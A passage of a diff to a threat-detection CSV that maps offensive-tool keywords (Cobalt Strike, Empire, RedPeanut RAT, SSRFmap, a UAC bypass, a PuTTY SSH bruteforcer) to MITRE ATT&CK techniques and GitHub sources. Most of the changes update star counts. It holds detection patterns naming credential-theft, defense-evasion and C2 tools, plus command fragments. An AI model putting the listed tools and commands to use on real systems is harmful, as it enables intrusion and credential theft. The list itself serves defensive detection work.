"*sshmon*kill*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*ssh-putty-brute -*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","254","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" -"*ssh-putty-brute.ps1*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","254","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" -"*SSH-PuTTY-login-bruteforcer*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","254","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*ssh-putty-brute -*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*ssh-putty-brute.ps1*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*SSH-PuTTY-login-bruteforcer*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" "*sshuttle -r *0.0.0.0/24*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*sslstrip*","offensive_tool_keyword","sslstrip","sslstrip is a MITM tool that implements Moxie Marlinspikes SSL stripping attacks.","T1557.001 - T1573 - T1559 - T1542 - T1552","TA0002 - TA0011 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/moxie0/sslstrip","1","1","N/A","N/A","10","1821","418","2021-05-29T01:53:12Z","2011-04-24T06:40:08Z" -"*SspiUacBypass.cpp*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" -"*SspiUacBypass.exe*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" -"*SspiUacBypass-main*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram 
Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass.cpp*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass.exe*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass-main*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*SSploitEnumeration*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitEnumerationDomain*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitExecution_DynamicInvoke*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - 
T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
@@ -17297,25 +17480,25 @@ "*SSploitLateralMovement*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitPersistence*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitPrivilegeEscalation*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*sspr2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*--ssrf --gopher --encode --scan-action filter-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" 
+"*sspr2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*--ssrf --gopher --encode --scan-action filter-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*ssrfmap -r *.txt -p id -m readfiles*portscan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*SSRFmap*","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. 
SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Web Attacks","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2463","459","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" -"*ssrfmap.py*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2463","459","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*SSRFmap*","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Web Attacks","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*ssrfmap.py*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*StackCrypt-main*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.cpp*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - 
T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.exe*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.sln*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.vcxproj*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" -"*stage.obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"*stage_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*stage_transform_x64_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*stage_transform_x64_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*stage_transform_x86_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*stage_transform_x86_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*Stage-gSharedInfoBitmap*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stage.obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*stage_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x64_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x64_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x86_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 